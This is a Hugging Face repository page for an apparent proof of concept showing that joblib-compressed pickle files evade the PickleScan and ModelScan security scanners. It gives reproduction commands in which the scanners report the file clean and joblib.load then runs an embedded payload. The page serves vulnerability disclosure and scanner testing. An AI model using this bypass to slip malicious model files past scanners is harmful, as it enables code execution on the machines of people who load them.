Hugging Face's logo

Rammadaeus
/
poc-joblib-compression-scanner-bypass

Joblib
Model card Files
xet
Community
YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

PoC: Joblib Compressed Pickle Bypasses ML Security Scanners

Format: Joblib (.joblib) Target: PickleScan + ModelScan CWE: CWE-502 (Deserialization of Untrusted Data)

Vulnerability

Joblib compressed pickles bypass both PickleScan and ModelScan. The scanners use pickletools.genops() which cannot parse compressed data, reporting files as clean. joblib.load() handles decompression and executes the embedded payload.

Reproduction 

pip install picklescan modelscan
picklescan -p poc_joblib_bypass.joblib  # Reports: Infected files: 0
modelscan scan -p poc_joblib_bypass.joblib  # Reports: No issues found!
python3 -c "import joblib; joblib.load('poc_joblib_bypass.joblib')"  # Executes payload

Tested: PickleScan 1.0.3, ModelScan 0.8.7

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support